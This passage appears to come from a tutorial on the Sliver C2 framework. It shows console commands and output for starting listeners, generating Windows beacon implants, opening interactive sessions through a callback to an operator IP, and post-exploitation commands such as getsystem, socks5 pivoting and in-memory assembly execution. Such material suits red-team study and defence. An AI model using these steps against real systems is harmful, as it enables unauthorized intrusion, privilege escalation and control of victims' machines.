Now we can run the sliver-server and it will drop us in a console where we can do basically everything we expect from a C2, like generating payloads, beacons, start listeners, interact with our beacons, etc…
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
➜ ./sliver-server [*] Loaded 21 aliases from disk [*] Loaded 110 extension(s) from disk
All hackers gain infect [*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df [*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
[server] sliver >
Multiplayer Mode
Multiplayer-mode allows multiple operators (players) to connect to the same Sliver server. Basically, you start the server and you can also start the client that will connect to the server where you get the same console, and the server can be remotely somewhere, but also it can be locally because if you accidently close the server, the beacons will have trouble connecting back to you but if you close the client nothing bad would happen, hope that makes sense. To setup multiplayer mode, we need to first create a new operator and give it a name, then we tell it that the connection will come from localhost:
➜ ./sliver-client ? Select a server: serioton@localhost (2a966044d4c58511) Connecting to localhost:31337 ... [*] Loaded 21 aliases from disk [*] Loaded 110 extension(s) from disk
Packages Command Name Version Type Help ============================= ========= =========== ========================================================================================================================================= bof-roast v0.0.2 Extension Beacon Object File repo for roasting Active Directory bof-servicemove v0.0.1 Extension Lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking c2tc-addmachineaccount v0.0.9 Extension AddMachineAccount [Computername] [Password <Optional>] c2tc-askcreds v0.0.9 Extension Collect passwords using CredUIPromptForWindowsCredentialsName c2tc-domaininfo v0.0.9 Extension enumerate domain information using Active Directory Domain Services c2tc-kerberoast v0.0.9 Extension A BOF tool to list all SPN enabled user/service accounts or request service tickets (TGS-REP)
[SNIP]
If we want to install a specific package, we can do so by providing the package name:
1 2 3
sliver > armory install rubeus
[*] Installing alias 'Rubeus' (v0.0.24) ... done!
Basic Commands
Setup a listener
To create a listener on port 53, we can use the following command:
1 2 3 4 5
sliver > mtls --lport 53
[*] Starting mTLS listener ...
[*] Successfully started job #2
mtls means mutual TLS which is a TCP listener but the communication over it is encrypted. We can also start http or https listeners:
ID Name Protocol Port Stage Profile ==== ====== ========== ======= =============== 1 grpc tcp 31337 2 mtls tcp 53
Beacons
Generating beacons
To generate a beacon, we can use the generate beacon command, in this case we generate a beacon for windows 64 bit, the format is .exe and we tell it to connect to our IP:
[*] Generating new windows/amd64 beacon implant binary (30s) [!] Symbol obfuscation is disabled [*] Build completed in 3s [*] Implant saved to /tmp/beacon.exe
The -G skips Shikata-Ganai-Encoding and --skip-symbols will leave sliver strings inside the binary. This reduces file size but can lead to detection.
Listing and interacting with beacons
To list all the beacons we have, we can use the beacons command:
1 2 3 4 5 6 7 8
sliver > beacons
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In ========== ============== =========== =========== ====================== ================== =============== =============== a7b8c0ca mist-http http(s) MS01 MIST\Brandon.Keywarp windows/amd64 257h38m33s 257h38m2s 7717ce78 axlle http(s) MAINFRAME AXLLE\gideon.hamill windows/amd64 180h58m49s 180h58m18s [SNIP] ede730e4 meow http(s) DC1 BLAZORIZED\NU_1055 windows/amd64 11h50m21s 11h49m50s
To interact with a beacon, we can run the use command and give it the beacon ID:
1 2 3 4 5
sliver > use ede730e4
[*] Active beacon meow (ede730e4-cc70-4552-9e7f-f4a8fa557615)
sliver (meow) >
Sessions
To turn a beacon into a session, we run the interactive command:
1 2 3 4
sliver (meow) > interactive
[*] Using beacon's active C2 endpoint: https://10.10.14.8:8443 [*] Tasked beacon meow (8d057a41)
This will create a running task that will open an interactive session when it’s time to execute again
1
[*] Session 2b8213e1 ...
We can list sessions using the command sessions. If we want to switch to the context of the session, we can do so by using the following command:
1 2 3
sliver (meow) > use 2b8213e1-5f9e-4d4f-b003-b17e62a239c3
[*] Active session meow (2b8213e1-5f9e-4d4f-b003-b17e62a239c3)
Other useful commands
execute-assembly
With execute-assembly we can run a .NET assembly (DLL or exe) in memory, by spawning a new process (notepad by default) that hosts the .NET-CLR.
getsystem
Spawn a new session as NT AUTHORITY/SYSTEM, by injecting into a system process when you are already in a high privileged shell.
ps
List processes and identify running security products such as AVs and EDRs.
socks5
Start a socks5 proxy in your implant with socks5 start. This proxy can then be used with e.g. proxychains to tunnel your tools through the implant into the corporate network.
sideload
Load and execute a shared object (shared library/DLL) in a remote process
Conclusion
This was a basic intro to sliver C2, but there’s a lot more you can do with it. Checkout the official documentation here: https://sliver.sh/docs. It’s very detailed and explains many things you can do with Sliver.
